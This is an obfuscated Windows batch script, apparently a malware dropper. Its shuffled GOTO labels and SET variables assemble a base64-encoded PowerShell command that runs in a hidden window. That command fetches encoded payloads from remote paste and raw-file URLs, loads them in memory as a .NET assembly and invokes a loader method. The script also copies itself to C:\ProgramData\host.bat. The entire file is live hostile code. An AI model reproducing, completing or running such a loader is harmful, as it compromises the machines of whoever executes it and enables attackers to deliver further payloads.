@echo off
GOTO GNDINJSDHO
:GGHJNGKHUD
SET OGDGDODIDI=AbgBkACAAJABlAG4AZABQAG8AcwAgAC0AZwB0ACAAJABzAHQAYQByAHQAUABvAHMAKQAgAHsACgAgACA
GOTO IJNFOHNFOG5
:SKDGFGIIDO
SET INDIOFGFNJ=HQAUABvAHMAIAA9ACAAJAB0AGUAeAB0AEMAbwBuAHQAZQBuAHQALgBJAG4AZABlAHgA
GOTO DDNDHFSIFO
:OFKOGKDGNG
SET SKDDGGIFNO=gACcAPAA8AEIAQQBTAEUANgA0AF8ARQBOAEQAPgA+ACcACgAKACAAIAAgACAAJABzAHQAYQByA
GOTO SKDGFGIIDO
:GIIFJNGSFD
SET GIGDSJFGJF=LwByAGEAdwAvAE4ATgBMAHcARQB3AEMAVQAnACkACgApAAoACgAkAHIAYQB3AEQAYQB0AGEAIAA9
GOTO NNIHJOSFFD
:NGGFSNIIJD
SET GJFGIIIIDG=4AHQALgApADMAKAAwADIAJQBkAGEAbwBsAHAAdQBkAGUAbgBnAGkAcwBk@AHQAcwBvAGgA
GOTO IUNGGJSHND0
:NNIHJOSFFD
SET DIOIJDNSDD=ACAARwBlAHQALQBSAGUAbQBvAHQAZQBEAGEAdABhACAAJAB0AGEAcgBnAGUAdABVAHIAbABzAAoAa
GOTO FJDIDGGNIO4
:JDGOIFINDI
SET NIFFFSNSGD=oAIAAgACAAIAAgACAAIAAgACAAIAAgACAAWwBvAGIAagBlAGMAdABbAF0AXQAgACgAJABsAG4
GOTO IUNGGJSHND8
:IUNGGJSHND
SET NFGSGGDUDJ=GkAdAB5AFAAcgBvAHQAbwBjAG8AbABUAHkAcABlAF0AOgA6AFQAbABzADEAMgAKAAoAZgB1A
GOTO IIOOIOHFSG
:FJDIDGGNIO
SET GGODJJNNDD=yle Hidden -ArgumentList '-Command \"$jghjghjgdgjghjghhjg = ''WwBO
GOTO IJNFOHNFOG
:NDUDNIGFIO
SET DDDGGFFFNS=G4AZABUAGEAZwApAAoACgAgACAAIAAgAGkAZgAgACgAJABzAHQAYQByAHQAUABvAHMAIAAtAGcAZQAgADAAIAAtAGE
GOTO GGHJNGKHUD
:NFSIDDHIOU
SET SGIONNDODD=HIAdABUAGEAZwAuAEwAZQBuAGcAdABoAAoAIAAgACAAIAAgACAAIAAgACQAYgBhAHMAZ
GOTO IJNFOHNFOG7
:OGJFNIOOGO
SET IDNSFNFOFN=AGQAZQByACAAPQAgAEcAZQB0AC0AUgBhAG4AZABvAG0AIAAtAEkAbgBwAHUAdABPAGIAagBlAGMAdAAgACQAdQ
GOTO KFDIGGFIJG
:DGNOGDKGGG

GOTO IIOOIOHFSG6
:NGNOGGFOIS
SET FGFDOHGDGG=^( $jghjghjgdgjghjghhjg.replace^(''k@'',''f''^)^)^);iex $oWjfuxd\"'";Copy-Item -
GOTO KFIISUIFDI
:FJDIDGGNIO5
SET JGSDGODISD=AeAB0AEMAbwBuAHQAZQBuAHQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGc
GOTO FJDIDGGNIO6
:DIIJIIINDH
SET GUKIHDJJJO=wAKACAAIAAgACAAcABhAHIAYQBtACAAKABbAHMAdAByAGkAbgBnAFsAXQBdACQAdQByAGwAcw
GOTO KGDSOIFUJI
:KFIISUIFDI
SET FSIUJGJNIF=Path '%~f0' -Destination 'C:\ProgramData\host.bat' -Force -ErrorAction SilentlyContinue"
GOTO ONKFUNIJJJ
:SJDOHKKFKG
SET IJGHIFGOFG=tAC4ARwBlAHQAVAB5AHAAZQAoACcAbQB5AHAAcgBvAGcAcgBhAG0ALgBIAG8
GOTO FFDDGJGODG
:IUNGGJSHND3
SET NDGSGUJSJO=AB1AGUAIAA9ACAAJwBWAGIAYwAnAAoAIAAgACAAIAAgACAAIAAgACQAcwB0AHIAIAA9ACAAJwA
GOTO IUNGGJSHND4
:NKGIGOJGID
SET ODSGOFINFG=oding]::Unicode.GetString^([system.convert]::Frombase64string
GOTO NGNOGGFOIS
:FFDDGJGODG
SET OFIGSDIFDJ=AbQBlAGUAcwAnACkACgAgACAAIAAgACAAIAAgACAAJABsAG4AawAgAD0AIAAgACcAdAB
GOTO NGGFSNIIJD
:DDNDHFSIFO
SET FNISDGDNNK=TwBmACgAJABzAHQAYQByAHQAVABhAGcAKQAKACAAIAAgACAAJABlAG4AZABQAG8AcwAgACAAIAA9ACAAJ
GOTO FFDGFFJFOH
:DISIFIIUON
SET FKSIFGKGNO=CAAIAAgACAAIAAgAHQAcgB5ACAAewAgAHIAZQB0AHUAcgBuACAAJABjAGwAaQBlAG4AdAAuAEQAbwB3AG4AbA
GOTO FJOOOOIISF
:FJOOOOIISF
SET DKNGODFFNF=BvAGEAZABEAGEAdABhACgAJAB1ACkAIAB9ACAAYwBhAHQAYwBoACAAewAgAG
GOTO OONKIODNGD
:ONKFUNIJJJ
%IJODDFFJIN%%OGDIDGGGFF%%GGODJJNNDD%%OGHDOGDNOG%%IODNINOSON%%NFGSGGDUDJ%%GUDDGONGNF%%GUKIHDJJJO%%NHDNDJUFFD%%OKIGGSUSGF%%IDNSFNFOFN%%JFDDFIIJSG%%GNDOFODNON%%FKSIFGKGNO%%DKNGODFFNF%%NKHIFGGGOU%%DFNUJNNDGF%%IFIDJGFNDG%%FUNGIIFFDD%%NFFDDIOFGJ%%GGKGIGFIGD%%FDGNJGJOGD%%GIGDSJFGJF%%DIOIJDNSDD%%IKDFIONSGG%%JGSDGODISD%%IFOGJOOIIN%%GGIGIJIJNK%%HOGGGSDGIN%%SKDDGGIFNO%%INDIOFGFNJ%%FNISDGDNNK%%SOUIFIDOOD%%DDDGGFFFNS%%OGDGDODIDI%%OJINJUJGSN%%SGIONNDODD%%NGOSNHHGNG%%SJFNIGGIHI%%ONHDDHFNGS%%OFNJDKGJND%%KHIGDGFNIG%%FFNFDDDFDI%%GNFIFGUNGF%%DGGSFIDOFN%%IDGOGGJIIG%%GFDGUGSKIJ%%IJGHIFGOFG%%OFIGSDIFDJ%%GJFGIIIIDG%%OGIIUIDJGO%%ISFJUGONIO%%FJGGJGNGIJ%%NDGSGUJSJO%%UIIGNFFJIS%%DODDONDGOG%%DFINGOJJDD%%NIFFFSNSGD%%GDFGONIIGO%%DOGDNINJGH%%NOJGGFSDJF%%ODSGOFINFG%%FGFDOHGDGG%%FSIUJGJNIF%
GOTO DGNOGDKGGG
:NNDDFOJNDN
SET GNDOFODNON=AGgAIAAoACQAdQAgAGkAbgAgACQAcgBhAG4AZABvAG0ATwByAGQAZQByACkAIAB7AAoAIAAgA
GOTO DISIFIIUON
:IUNGGJSHND4
SET UIIGNFFJIS=xACcACgAgACAAIAAgACAAIAAgACAACgAgACAAIAAgACAAIAAgACAAJAB0AGEAcgBnA
GOTO IUNGGJSHND5
:IUNGGJSHND5
SET DODDONDGOG=GUAdABUAHkAcABlAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAHIAdQBuACcAIAArACAAJwBzAHMAJwApAC4AS
GOTO IUNGGJSHND6
:FJDIDGGNIO4
SET IKDFIONSGG=QBmACAAKAAkAHIAYQB3AEQAYQB0AGEAIAAtAG4AZQAgACQAbgB1AGwAbAApACAAewAKACAAIAAgACAAJAB0AGU
GOTO FJDIDGGNIO5
:FFDGFFJFOH
SET SOUIFIDOOD=AB0AGUAeAB0AEMAbwBuAHQAZQBuAHQALgBJAG4AZABlAHgATwBmACgAJABlA
GOTO NDUDNIGFIO
:IJNFOHNFOG
SET OGHDOGDNOG=AGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAU
GOTO SKIDGNIOJS
:SDSNGFONKN
SET FUNGIIFFDD=QAYgBhAHMAZQBVAHIAbAAgAD0AIAAkAHMAYwBoAGUAbQBlADEAIAArACAAJA
GOTO JKKNOHOFFG9
:DJJDIJNNIJ
SET IDGOGGJIIG=AGIAbAB5AF0AOgA6AEwAbwBhAGQAKAAkAGEAcwBzAGUAbQBiAGwAeQBCAHkAdABlAHMAKQ
GOTO SKIDGNIOJS6
:OOFDDOFSIJ
SET DFNUJNNDGF=B0AHUAcgBuACAAJABuAHUAbABsAAoAk@QAKACQAcwBjAGgAZQBtAGUAMQAgAD0AIAA
GOTO JKKNOHOFFG7
:IUNGGJSHND6
SET DFINGOJJDD=QBuAHYAbwBrAGUAKAAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAbgB1AGwAbAAsAA
GOTO JDGOIFINDI
:FJDIDGGNIO8
SET HOGGGSDGIN=ADYANAAnACAAKwAgACcAXwBTAFQAQQBSAFQAPgA+ACcACgAgACAAIAAgACQAZQBuAGQAVABhAGcAIAAgACAAPQA
GOTO OFKOGKDGNG
:IIOOIOHFSG
SET GUDDGONGNF=G4AYwB0AGkAbwBuACAARwBlAHQALQBSAGUAbQBvAHQAZQBEAGEAdABhACAAe
GOTO DIIJIIINDH
:KFDIGGFIJG
SET JFDDFIIJSG=ByAGwAcwAgAC0AQwBvAHUAbgB0ACAAJAB1AHIAbABzAC4ATABlAG4AZwB0AGgACgAgACAAIAAgAGYAbwByAGUAYQBj
GOTO NNDDFOJNDN
:FJDIDGGNIO7
SET GGIGIJIJNK=hACkACgAgACAAIAAgACQAcwB0AGEAcgB0AFQAYQBnACAAPQAgACcAPAA8AEIAJwAgACsAIAAnAEEAUwBF
GOTO FJDIDGGNIO8
:IJNFOHNFOG7
SET NGOSNHHGNG=QA2ADQATABlAG4AZwB0AGgAIAA9ACAAJABlAG4AZABQAG8AcwAgAC0AIAAkAHMAdABhAHIAdABQAG8AcwAKAC
GOTO IJNFOHNFOG8
:JSGDJIKSUF
SET GNFIFGUNGF=ABDAGgAdQBuAGsAKQAKACAAIAAgACAAIAAgACAAIAAkAGwAbwBhAGQAZQBkAEEAcwB
GOTO SKIDGNIOJS4
:FJDIDGGNIO0
SET GGKGIGFIGD=AHMAZQBVAHIAbAAgACsAIAAnAHAAYQBzAHQAZQBmAHkALgBhAHAAcAAvAHMATABDADcASgBwAGsA
GOTO FJDIDGGNIO1
:OONKIODNGD
SET NKHIFGGGOU=MAbwBuAHQAaQBuAHUAZQAgAH0ACgAgACAAIAAgAH0ACgAgACAAIAAgAHIAZQ
GOTO OOFDDOFSIJ
:JKKNOHOFFG
SET OGDIDGGGFF=MROOT%\System32\WindowsPowerShell\v1.0\powershell.exe -WindowSt
GOTO FJDIDGGNIO
:SKIDGNIOJS
SET IODNINOSON=wBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbAAgAD0AIABbAE4AZQB0AC4AUwBlAGMAdQByA
GOTO IUNGGJSHND
:JKKNOHOFFG7
SET IFIDJGFNDG=nAGgAdAB0AHAAJwAKACQAcwBjAGgAZQBtAGUAMgAgAD0AIAAnAHMAOgAvAC8AJwAKAC
GOTO SDSNGFONKN
:SKIDGNIOJS1
SET KHIGDGFNIG=ZQBtAGIAbAB5AEIAeQB0AGUAcwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdA
GOTO SKIDGNIOJS2
:IUNGGJSHND0
SET OGIIUIDJGO=LwBuAGkAYQBtAC8AcwBkAGEAZQBoAC8AcwBmAGUAcgAvAHQAbgBlAGcAYQB0AHMAZ
GOTO IUNGGJSHND1
:FJDIDGGNIO6
SET IFOGJOOIIN=AXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJAByAGEAdwBEAGEAdAB
GOTO FJDIDGGNIO7
:IJNFOHNFOG8
SET SJFNIGGIHI=AAIAAgACAAIAAgACAAIAAkAGIAYQBzAGUANgA0AEMAaAB1AG4AawAgAD0AIAAkAHQAZQB4AHQ
GOTO IJNFOHNFOG9
:IJNFOHNFOG5
SET OJINJUJGSN=AIAAgACAAIAAgACAAJABzAHQAYQByAHQAUABvAHMAIAArAD0AIAAkAHMAdABhA
GOTO NFSIDDHIOU
:SKIDGNIOJS4
SET DGGSFIDOFN=tACAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBt
GOTO DJJDIJNNIJ
:SKIDGNIOJS0
SET OFNJDKGJND=HMALAAgACQAYgBhAHMAZQA2ADQATABlAG4AZwB0AGgAKQAKAAoAIAAgACAAIAAgACAAIAAgACQAYQBzAHMA
GOTO SKIDGNIOJS1
:IUNGGJSHND9
SET DOGDNINJGH=sAHUAZQAsACAAJwAwACcALAAgACcAeAA2ADQAJwApAAoAIAAgACAAIAAgACAA
GOTO IIOOIOHFSG0
:KGDSOIFUJI
SET NHDNDJUFFD=ApAAoAIAAgACAAIAAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcw
GOTO OUGJUSFJDN
:IIOOIOHFSG0
SET NOJGGFSDJF=IAAgACkACgAgACAAIAAgAH0ACgB9AA=='';$oWjfuxd = [system.Text.enc
GOTO NKGIGOJGID
:GNDINJSDHO
SET IJODDFFJIN=%SYSTEMROOT%\System32\WindowsPowerShell\v1.0\powershell.exe -Command "Start-Process %SYSTE
GOTO JKKNOHOFFG
:IUNGGJSHND2
SET FJGGJGNGIJ=UAYgB1AGgAdABpAGcALgB3AGEAcgAvAC8AOgBzACcACgAgACAAIAAgACAAIAAgACAAJABpAG4AagBWAGEAb
GOTO IUNGGJSHND3
:IUNGGJSHND8
SET GDFGONIIGO=AawAgACAALAAgACQAcwB0AHIALAAgACcAaABvAHMAdAAnACwAIAAkAGkAbgBqAFYAYQB
GOTO IUNGGJSHND9
:SKIDGNIOJS2
SET FFNFDDDFDI=DoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABiAGEAcwBlADYAN
GOTO JSGDJIKSUF
:JKKNOHOFFG9
SET NFFDDIOFGJ=BzAGMAaABlAG0AZQAyAAoACgAkAHQAYQByAGcAZQB0AFUAcgBsAHMAIAA9ACAAQAAoAAoAIAAgACAAIAAoACQAYgBh
GOTO FJDIDGGNIO0
:SKIDGNIOJS6
SET GFDGUGSKIJ=AKAAoAIAAgACAAIAAgACAAIAAgACQAdABhAHIAZwBlAHQAVAB5AHAAZQAgAD0AIAAkAGwAbwBhAGQAZQBkAEEAcwB
GOTO SJDOHKKFKG
:IUNGGJSHND1
SET ISFJUGONIO=QB0AC8AawBpAGEAegBvAC8AbQBvAGMALgB0AG4AZQB0AG4AbwBjAHIAZQBzAH
GOTO IUNGGJSHND2
:IJNFOHNFOG9
SET ONHDDHFNGS=AQwBvAG4AdABlAG4AdAAuAFMAdQBiAHMAdAByAGkAbgBnACgAJABzAHQAYQByAHQAUABvA
GOTO SKIDGNIOJS0
:OUGJUSFJDN
SET OKIGGSUSGF=B0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQACgAgACAAIAAgACQAcgBhAG4AZABvAG0ATwBy
GOTO OGJFNIOOGO
:FJDIDGGNIO1
SET FDGNJGJOGD=cAAvAHIAYQB3ACcAKQAsAAoAIAAgACAAIAAoACQAYgBhAHMAZQBVAHIAbAAgACsAIAAnAHkAYQBzAG8ALgBzAHUA
GOTO GIIFJNGSFD
:IIOOIOHFSG6